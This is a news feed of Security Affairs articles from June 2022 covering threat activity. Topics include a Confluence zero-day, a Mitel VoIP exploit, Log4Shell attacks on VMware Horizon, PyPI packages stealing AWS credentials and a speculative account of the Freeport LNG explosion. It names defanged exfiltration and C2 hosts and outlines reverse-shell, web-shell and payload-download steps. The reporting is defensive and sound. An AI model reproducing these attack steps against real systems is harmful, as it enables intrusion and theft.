There are new articles available, click to refresh the page.
Yesterday — 26 June 2022Security Affairs

Threat actors sell access to tens of vulnerable networks compromised by exploiting Atlassian 0day

26 June 2022 at 18:27

A threat actor is selling access to 50 vulnerable networks that have been compromised exploiting the recently disclosed Atlassian Confluence zero-day.

A threat actor is selling access to 50 vulnerable networks that have been compromised by exploiting the recently discovered Atlassian Confluence zero-day flaw (CVE-2022-26134).

The discovery was made by the Rapid7 Threat Intelligence team and was disclosed by The Record. Access to the vulnerable networks was offered on the Russian-language forum XSS.

According to Rapid7 experts, the seller has a good reputation on the hacking forum, they also urge administrators to patch their installs. Rapid7 is attempting to identify the 50 companies and notify them.

At the end of May, Atlassian warned of a critical unpatched remote code execution vulnerability affecting all Confluence Server and Data Center supported versions, tracked as CVE-2022-26134, that is being actively exploited in attacks in the wild.

“Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server. Further details about the vulnerability are being withheld until a fix is available.” reads the advisory published by the company.

The vulnerability was reported by security firm Volexity which discovered the issue as part of an investigation into an attack that took over the Memorial Day weekend.

Back to Rapid7’s discovery, the bad news is that the seller that is offering access to the 50 networks also plans to sell access to a list of 10,000 additional vulnerable machines.

Organizations running confluence servers should also look for indicators of compromise within their networks to determine if they have been breached.

Ransomware gangs are actively exploiting CVE-2022-26134 remote code execution (RCE) flaw in Atlassian Confluence Server and Data Center.

Researchers from security firm Prodaft first reported that AvosLocker ransomware operators have already started exploiting the Atlassian Confluence bug, BleepingComputer reported.

The researchers noticed the creation of a “confluence campaign” in the control panel of the AvosLocker operation.

BleepingComputer also reported that operators behind Cerber2021 ransomware (aka CerberImposter) are actively exploiting the Confluence flaw in recent attacks.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Atlassian)

The post Threat actors sell access to tens of vulnerable networks compromised by exploiting Atlassian 0day appeared first on Security Affairs.

Security Affairs newsletter Round 371 by Pierluigi Paganini

26 June 2022 at 14:23

A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

Oracle spent 6 months to fix ‘Mega’ flaws in the Fusion Middleware
Multiple malicious packages in PyPI repository found stealing AWS secrets
Attackers exploited a zero-day in Mitel VOIP devices to compromise a network 
Threat actors continue to exploit Log4Shell in VMware Horizon Systems
Vulnerabilities in the Jacuzzi SmartTub app could allow to access users’ data
Google TAG argues that Italian surveillance firm RCS Labs was helped by ISPs to infect mobile users
Chinese Tropic Trooper APT spreads a hacking tool laced with a backdoor
NSO Group told lawmakers that Pegasus spyware was used by at least 5 European countries
QNAP warns of a critical PHP flaw that could lead to remote code execution
Researchers found flaws in MEGA that allowed to decrypt of user data
Exclusive: Lithuania under cyber-attack after the ban on Russian railway goods
Magecart attacks are still around but are more difficult to detect
Thank you!!! SecurityAffairs awarded as Best European Personal Cybersecurity Blog 2022
Crooks are using RIG Exploit Kit to push Dridex instead of Raccoon stealer
Flagstar Bank discloses a data breach that impacted 1.5 Million individuals
New ToddyCat APT targets high-profile entities in Europe and Asia
New DFSCoerce NTLM relay attack allows taking control over Windows domains
Cybercriminals Use Azure Front Door in Phishing Attacks
Russian APT28 hacker accused of the NATO think tank hack in Germany
Google expert detailed a 5-Year-Old flaw in Apple Safari exploited in the wild
Security Affairs newsletter Round 370 by Pierluigi Paganini
Cisco will not address critical RCE in end-of-life Small Business RV routers
BRATA Android Malware evolves and targets the UK, Spain, and Italy
Critical flaw in Ninja Forms WordPress Plugin actively exploited in the wild
Experts warn of a new eCh0raix ransomware campaign targeting QNAP NAS

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 371 by Pierluigi Paganini appeared first on Security Affairs.

China-linked APT Bronze Starlight deploys ransomware as a smokescreen

26 June 2022 at 13:40

China-linked APT Bronze Starlight is deploying post-intrusion ransomware families as a diversionary action to its cyber espionage operations.

Researchers from Secureworks reported that a China-linked APT group, tracked as Bronze Starlight (APT10), is deploying post-intrusion ransomware families to cover up the cyber espionage operations.

The experts observed an activity cluster involving post-intrusion ransomware such as LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0.

Bronze Starlight timeline ransomware

However, the victimology, the short lifespan of each ransomware family employed in the attacks, and access to malware used by nation-state actors suggest that the main motivation of the group may be intellectual property theft or cyberespionage. The victims include pharmaceutical companies in Brazil and the U.S., a U.S.-based media organization with offices in China and Hong Kong, electronic component designers and manufacturers in Lithuania and Japan, a law firm in the U.S., and an aerospace and defense division of an Indian conglomerate.

“The ransomware could distract incident responders from identifying the threat actors’ true intent and reduce the likelihood of attributing the malicious activity to a government-sponsored Chinese threat group.” reads the report published by the experts. “The operational cadence and victimology of LockFile, AtomSilo, Rook, Night Sky, and Pandora deployments do not align with conventional financially motivated cybercrime operations. In each case, the ransomware targets a small number of victims over a relatively brief period of time before it ceases operations, apparently permanently.”

Bronze Starlight, active since mid-2021, is also tracked by Microsoft under the emerging threat cluster moniker DEV-0401, with the tech giant emphasizing its involvement in all stages of the ransomware attack cycle right from initial access to the payload deployment.

A group’s hallmark is the use of the HUI Loader, which is a custom DLL loader loaded by legitimate programs that are vulnerable to DLL search order hijacking. The HUI Loader is used to decrypt and load a third file containing an encrypted payload that is also deployed to the infected host.

Since early 2021, Secureworks CTU researchers observed threat actors deploying HUI Loader in a campaign aimed at intellectual property theft and primarily targeting Japanese organizations. The HUI Loader was employed to load the SodaMaster RAT. The experts pointed out that the victimology and tactics, techniques, and procedures in this campaign align with BRONZE RIVERSIDE activity.

In mid-2021, CTU researchers began tracking a second cluster of activity that uses HUI Loader to load Cobalt Strike Beacon and deploy ransomware. CTU researchers attribute this second cluster of activity to the BRONZE STARLIGHT threat group.

Experts noticed that the HUI Loader samples used to load Cobalt Strike Beacon were involved in the deployment of LockFileAtomSilo, Rook, Night Sky, and Pandora ransomware.

“The use of HUI Loader to load Cobalt Strike Beacon, the Cobalt Strike Beacon configuration information, the C2 infrastructure, and the code overlap suggest that the same threat group is associated with these five ransomware families. It is likely that BRONZE STARLIGHT is responsible for LockFile, AtomSilo, Rook, Night Sky, and Pandora intrusion activity.” continues the analysis.

CTU pointed out that four HUI Loader samples decrypt and load PlugX RAT payloads, a malware historically used by multiple Chinese threat groups.

“BRONZE STARLIGHT compromises networks by exploiting vulnerabilities in network perimeter devices, including known vulnerabilities for which patches are available. The threat actors deploy HUI Loader to decrypt and execute a Cobalt Strike Beacon for command and control. They then deploy ransomware and exfiltrate sensitive data from the victim’s environment.” concludes the report. “Both the exploitation of known vulnerabilities and the use of the Cobalt Strike for command and control provide opportunities to detect and prevent BRONZE STARLIGHT intrusion activity before exfiltration or ransomware deployment.” 

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Bronze Starlight)

The post China-linked APT Bronze Starlight deploys ransomware as a smokescreen appeared first on Security Affairs.

Russia-linked actors may be behind an explosion at a liquefied natural gas plant in Texas

26 June 2022 at 09:32

Russian threat actors may be behind the explosion at a liquefied natural gas plant in Texas, the incident took place on June 8.

A Russian hacking group may be responsible for a cyber attack against a liquefied natural gas plant in Texas that led to its explosion on June 8.

The explosion took place at the Freeport Liquefied Natural Gas (Freeport LNG) liquefaction plant and export terminal on Texas’ Quintana Island. The June 8 incident will have a lasting impact on Freeport LNG’s operations.

liquefied natural gas plant in Texas

Preliminary investigations suggested that the incident resulted from the overpressure and rupture of a segment of an LNG transfer line, leading to the rapid flashing of LNG and the release and ignition of the natural gas vapor cloud.

At this time it is not clear why the safety mechanisms in place did not prevent the explosion. Experts speculate a cyber attack may have turned off the industrial safety controls at the natural gas facility.

ICS malware like TRITON, which experts associated with Russia-linked APT group XENOTIME, has offensive capabilities to shut down industrial safety controls and cause extensive damages to industrial facilities.

“On March 24 the U.S. Department of Justice brought charges against four Russian nationals suspected of using TRITON malware in cyber attacks on behalf of the Russian government between 2012 and 2018. That same day, the FBI issued an advisory warning that TRITON malware tools still remain a major threat to industrial systems around the world.” reported the American Military News website.

The Washington Times national security writer Tom Rogan confirmed that the explosion at the Freeport LNG facility could be consistent with a hacking campaign conducted by APT groups like XENOTIME.

Rogan added that the company does have in place the Operation Technology/Industrial Control Systems network detection systems.

At this time, Freeport LNG denied the theory that sees a cyber attack as the root cause of the incident.

“Unless Freeport LNG has OT/ICS network detection systems deployed appropriately and has completed a forensics investigation, a cyberattack cannot be ruled out,” Rogan wrote.

“Two more sources who spoke with Rogan said that around the time of Russia launched its invasion of Ukraine, a cyber unit of Russia’s GRU military intelligence service conducted targeting-reconnaissance operations against Freeport LNG.” continues the American Military News website.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, liquefied natural gas plant)

The post Russia-linked actors may be behind an explosion at a liquefied natural gas plant in Texas appeared first on Security Affairs.

Before yesterdaySecurity Affairs

Oracle spent 6 months to fix ‘Mega’ flaws in the Fusion Middleware

25 June 2022 at 20:08

Researchers disclose technical details of a critical flaw in Fusion Middleware, tracked as CVE-2022–21445, that Oracle took six months to patch.

Security researchers have published technical details of a critical Fusion Middleware vulnerability, tracked as CVE-2022–21445, that was reported to Oracle by researchers PeterJson of VNG Corporation and Nguyen Jang of VNPT in October 2021. The flaw was addressed by the IT giant six months later with the release of its April 2022 Critical Patch Update.

The vulnerability resides in the ADF Faces component, it is deserialization of untrusted data that could lead to arbitrary code execution.

The security duo described the issue as a mega flaw that impacts all applications relying on ADF Faces, including Business Intelligence, Enterprise Manager, Identity Management, SOA Suite, WebCenter Portal, Application Testing Suite, and Transportation Management. The duo named their attack “The Miracle Exploit.”

“Now after a period of time after Oracle released the patch, we decided to publish this blog to share the detail of Miracle exploit. We very very excited at the time (6 months ago), but now we don’t have that feeling anymore because Oracle took too long to patch this vulnerability, more than the standard.” reported the security duo in blog post. “Anyway, this is a cool exploit, a cool story me and  Jang worked together in a month so let we tell you about our story.”

The researchers also discovered a server-side request forgery (SSRF) vulnerability, tracked as CVE-2022–21497. This issue could be chained with CVE-2022–21445 to achieve pre-authentication remote code execution in Oracle Access Manager.

“In the demonstration we sent to Oracle, we chose edelivery.oracle.com , businessnetwork.oracle.com which are popular for user to download Oracle’s Products and this site is based on ADF Faces framework.” concludes the experts. “Last but not least, we successfully achieved pre-auth RCE on login.oracle.com which is play an important role in oracle’s online services.”

“Why we hack some Oracle’s sites? Because we want to demonstrate the impact to Oracle and let them know this vulnerability is super dangerous , it affects Oracle system and Oracle’s customers. That’s why we want Oracle take an action ASAP. But as you can see, 6 months for Oracle to patch it, I don’t know why, but we have to accept it and follow Oracle’s policy.” they added.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Oracle)

The post Oracle spent 6 months to fix ‘Mega’ flaws in the Fusion Middleware appeared first on Security Affairs.

Multiple malicious packages in PyPI repository found stealing AWS secrets

25 June 2022 at 17:52

Researchers discovered multiple malicious Python packages in the official PyPI repository stealing AWS credentials and other info.

Sonatype researchers discovered multiple Python packages in the official PyPI repository that have been developed to steal secrets (i.e. AWS credentials and environment variables) and also upload these to a publicly exposed endpoint.

The malicious packages, which were reported to PyPI, are:

“Analyzed by Sonatype security researchers Jorge Cardona and Carlos Fernández, some of these packages either contain code that reads and exfiltrates your secrets or use one of the dependencies that will do the job.” reads the post published by Sonatype.

After notify PyPI, the packages and the endpoint have now been taken down.

For example, the analysis of the ‘loglib-modules’ and ‘pygrata-utils’ packages revealed the presence of malicious code to steal AWS credentials and metadata and upload them to one or more endpoints hosted on the PyGrata domain: hxxp://graph.pygrata[.]com:8000/upload

PyPI malicious packages 2

The stolen data were exposed on the in the form of hundreds of .TXT files publicly available.

“Interestingly though, our researchers noticed the endpoints collecting these credentials were exposing this data to just about anyone on the web. Going up a directory level showed us hundreds of TXT files containing sensitive information and secrets like those shown in the redacted screenshot below.” continues the analysis.

The experts have yet to discover the identity of the threat actor and their motivation. One possible cause of the exposure of this info is poor OPSEC practices of the attackers. another

Another hypothesis is that it is the data is the result of some kind of legitimate security testing.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, PyPI malicious packages)

The post Multiple malicious packages in PyPI repository found stealing AWS secrets appeared first on Security Affairs.

Attackers exploited a zero-day in Mitel VOIP devices to compromise a network 

25 June 2022 at 11:59

Experts warn threat actors have exploited a zero-day vulnerability in a Mitel VoIP appliance in a ransomware attack.

CrowdStrike researchers recently investigated the compromise of a Mitel VOIP appliance as an entry point in a ransomware attack against the network of an organization. 

The attackers exploited a remote code execution zero-day vulnerability on the Mitel appliance to gain initial access to the target environment. The zero-day was coded as CVE-2022-29499 and received a CVSS score of 9.8.

“A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the context of the Service Appliance.” reads the advisory for this flaw published by the vendor.

The experts determined that the malicious activity had originated from an internal IP address associated with a Linux-based Mitel VOIP appliance sitting on the network perimeter that did not have the CrowdStrike Falcon sensor installed on it.

The forensic investigation revealed that the attackers attempted to remove the files and overwrite free space on the device.

The attack chain involved two HTTP GET requests used to retrieve a specific resource from a remote server and execute the malicious code.

“The exploit involved two GET requests. The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation.” reads the analysis published by Crowdstrike experts. “This first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses.”

The responses to the requests demonstrated that the threat actors used the exploit to create a reverse shell.

Once created the reverse shell, the attacker set up a web shell named pdf_import.php.

The threat actor also downloaded the Chisel tunneling/proxy tool onto the VOIP appliance, then renamed it memdump before executing it. The attackers used the tool as a reverse proxy to allow the threat actor to make lateral movements within the environment via the VOIP device.

“when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant.” concludes the report. “Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via “one hop” from the compromised device. In particular, it’s critical to isolate and limit access to virtualization hosts or management servers such as ESXi and vCenter systems as much as possible. This can involve jump-boxes, network segmentation and/or multifactor authentication (MFA) requirements. “

The popular security researcher Kevin Beaumont reported there are nearly tens of thousand devices publicly accessible, most of them in the U.S., followed by the U.K., Canada, and France.

Shodan search to find Mitel boxes:


Presentation online has roughly doubled in 5 years. pic.twitter.com/IYC4r0hjdk

— Kevin Beaumont (@GossiTheDog) June 24, 2022

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Mitel VOIP)

The post Attackers exploited a zero-day in Mitel VOIP devices to compromise a network  appeared first on Security Affairs.

Threat actors continue to exploit Log4Shell in VMware Horizon Systems

24 June 2022 at 15:07

The U.S. CISA and the Coast Guard Cyber Command (CGCYBER) warn of attacks exploiting the Log4Shell flaw in VMware Horizon servers.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), published a joint advisory to warn of hacking attempts exploiting the Log4Shell flaw in VMware Horizon servers to compromise target networks.

“CISA and the United States Coast Guard Cyber Command (CGCYBER) have released a joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches.” reads the advisory.

The CVE-2021-44228 flaw made the headlines in December, after Chinese security researcher p0rz9 publicly disclosed a Proof-of-concept exploit for the critical remote code execution zero-day vulnerability (aka Log4Shell) that affects the Apache Log4j Java-based logging library.

In one attack documented by the government experts, threat actors were able to move laterally inside the network and collect and exfiltrate sensitive data.

This alert includes information about APT actors’ tactics, techniques, and procedures (TTPs), along with indicators of compromise related to the loader malware.

In one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.

Based on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed “hmsvc.exe” that’s equipped with capabilities to log keystrokes and deploy additional malware.

“The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network.” reads the joint alert.

In an attack that took place at the end of January, threat actors exploited the Log4Shell in an unpatched VMware Horizon server, then used PowerShell scripts to connect a remote server (109.248.150[.]13) via Hypertext Transfer Protocol (HTTP) to retrieve additional PowerShell scripts. In the same period, CISA observed the actors attempt to download and execute a malicious file from 109.248.150[.]13. The activity started from IP address 104.155.149[.]103, which appears to be part of the actors’ C2 infrastructure.

In a distinct attack, APT actors used PowerShell scripts in the production environment to facilitate lateral movement and implant loader malware that allows remotely monitoring a system’s desktop, gaining reverse shell access, exfiltrating data, and uploading and executing next-stage binaries.

The researchers observed a distinct threat actor exploiting the CVE-2022-22954 in VMware Workspace ONE Access and Identity Manager to deliver the Dingo J-spy web shell.

The alert includes Incident Response and Mitigations about the ongoing attacks.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Log4Shell)

The post Threat actors continue to exploit Log4Shell in VMware Horizon Systems appeared first on Security Affairs.

  • There are no more articles